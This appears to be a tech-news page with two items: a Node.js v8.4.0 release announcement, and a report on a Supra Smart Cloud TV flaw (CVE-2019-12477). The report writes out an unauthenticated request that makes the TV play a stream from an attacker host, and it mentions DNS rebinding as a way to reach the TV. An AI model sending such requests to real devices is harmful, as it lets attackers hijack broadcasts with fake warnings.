Node v8.4.0 released

New version of one of the most popular JavaScript run-time environments out now
18 August 2017   1975

Node.js developers work hard on their product. New version 8.4.0 has been released recently.

What’s inside?

  • HTTP2

    • Experimental support for the built-in http2 has been added via the --expose-http2 flag.
  • Inspector

    • require() is available in the inspector console now.
    • Multiple contexts, as created by the vm module, are supported now.
  • N-API

    • New APIs for creating number values have been introduced.
  • Stream

    • For Duplex streams, the high water mark option can now be set independently for the readable and the writable side.
  • Util

    • util.format now supports the %o and %O specifiers for printing objects.

Related links

  • Official website
  • Documents.
  • Windows 32-bit Installer
  • Windows 64-bit Installer
  • Windows 32-bit Binary
  • Windows 64-bit Binary
  • macOS 64-bit Installer
  • macOS 64-bit Binary
  • Linux 32-bit Binary
  • Linux 64-bit Binary
  • Linux PPC LE 64-bit Binary
  • Linux PPC BE 64-bit Binary
  • Linux s390x 64-bit Binary
  • AIX 64-bit Binary
  • SunOS 32-bit Binary
  • SunOS 64-bit Binary
  • ARMv6 32-bit Binary
  • ARMv7 32-bit Binary
  • ARMv8 64-bit Binary
  • Source Code
  • Other release files

Supra Smart Cloud TV to be Hacked

Now hacker can replace video being watched with own content
04 June 2019   298

A vulnerability has been identified on the Supra Smart Cloud TV (CVE-2019-12477). It makes possible to replace the transmission currently being watched for the content of the attacker. As an example, the output of a bogus emergency warning is shown.

To attack, just send a specially designed network request that does not require authentication. In particular, hacker can contact the handler "/ remote / media_control? Action = setUri & uri =" by specifying the URL of the m3u8 file with the video parameters, for example "http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker .com / fake_broadcast_message.m3u8 ".

In most cases, access to the IP address of the TV is limited to the internal network, but since the request is sent via HTTP, it is possible to use methods to access internal resources when the user opens a specially designed external page (for example, under the request of a picture or using the DNS rebinding method).